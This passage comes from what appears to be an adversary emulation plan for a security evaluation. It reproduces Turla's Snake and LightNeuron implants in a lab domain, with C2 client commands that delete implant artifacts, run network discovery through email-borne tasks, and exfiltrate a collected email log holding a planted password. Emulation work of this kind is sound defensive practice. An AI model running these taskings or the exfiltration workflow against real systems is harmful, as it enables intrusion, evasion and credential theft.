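    print(install_status(SAMPLE_WMIC, SAMPLE_INSTALL_LOG))
```

A non-zero `ReturnValue` means WMI never started cmd.exe on drebule and the log will not exist; an empty `errors` list with `transport_restarted` set is the state the plan wants before moving on.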

  • Wait 1 minute and then task Snake to remove artifacts from uosis (10.100.40.102):
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\msiex.ps1 C:\\Windows\\System32\\wdr.rules.xml C:\\Windows\\System32\\mtxconf.dll C:\\Windows\\System32\\mtxcli.dll C:\\Windows\\System32\\perfe009.dat"}'

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 19 - Discovery and Email Collection

🎤 Voice Track:

Step 19 emulates Turla sending several discovery commands to the LightNeuron implant and collecting and exfiltrating email traffic.

Emails with JPG attachments containing AES-encrypted commands embedded using steganography are sent from the C2 server to the domain. LightNeuron's transport agent processes all emails via LightNeuron's companion DLL, which executes the embedded command and blocks delivery of the email from the C2 server.

LightNeuron automatically collects all emails with recipients matching nk.local in a log file (C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\msmdat.xml).

Eventually, LightNeuron is tasked to exfiltrate the email log, which is exfiltrated over the existing C2 channel.


# ☣️ Procedures

  • From the Kali C2 lower terminal window, task LightNeuron to perform system network configuration discovery:
./evalsC2client.py --set-task info@nk.local '5 | ipconfig /all'
  • If no response is received after 5 minutes, check the Postfix logs on the Kali server to make sure the email was intercepted and processed correctly by LightNeuron:

grep postfix /var/log/syslog
    • If there is a reject entry, the email, which is addressed to a nonexistent user, was processed by the Exchange server itself, meaning that LightNeuron either was not installed successfully or is not working properly.
  • ➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas.

  • Go to your Edge browser window with the OWA page. Your window should still be up from Step 17.

  • Create a new email:

  • The email recipient should be the user egle@nk.local

  • The email subject should be SAP Integration Issue

  • The following text should be pasted in as the email body:

    Hi Egle,
    After our meeting earlier I spoke with Tenko about the SAP integration issue that was preventing the users from logging in. I did a little digging and noticed there is an authentication error on the SAP server.
    
    When you get a few minutes could you check to make sure the service account is still active and the credentials have not expired? The account name is SVC_SAP2.
  • Send the email

➡️ Switch to your RDP window to Azuolas (10.100.40.103) as Egle.

  • Go to your Edge browser window. You should still be logged into OWA from Step 11.

  • You should see the email from Zilvinas@nk.local. Try reloading the page if needed.

  • Reply to the email from Zilvinas.

  • The following text should be pasted in as the email reply body:

    Zilvinas,
    
    I just checked on the service account. It appears that the account was still active, but the password had expired. I've adjusted the settings for the account, so the password should not expire again.
    
    The new password is: dfsbH%T5RWf3bwq3aeGR$3%
    
    Let me know if this fixes the authentication issue.
  • Send the email

➡️ Return to the Kali C2 server lower terminal window. Task the LightNeuron implant to exfiltrate the email log file:

./evalsC2client.py --set-task info@nk.local '3 | 0'
  • The file contents will be logged by the control server. Verify that exfil was logged by the control server by checking the terminal window with the server output or by checking the server log file. The logs should contain the password Egle sent to Zilvinas:
grep 'dfsbH%T5RWf3bwq3aeGR$3%' /opt/day2/turla/Resources/control_server/logs.txt

# 🗿 Source Code

# 🔬 Cited Intelligence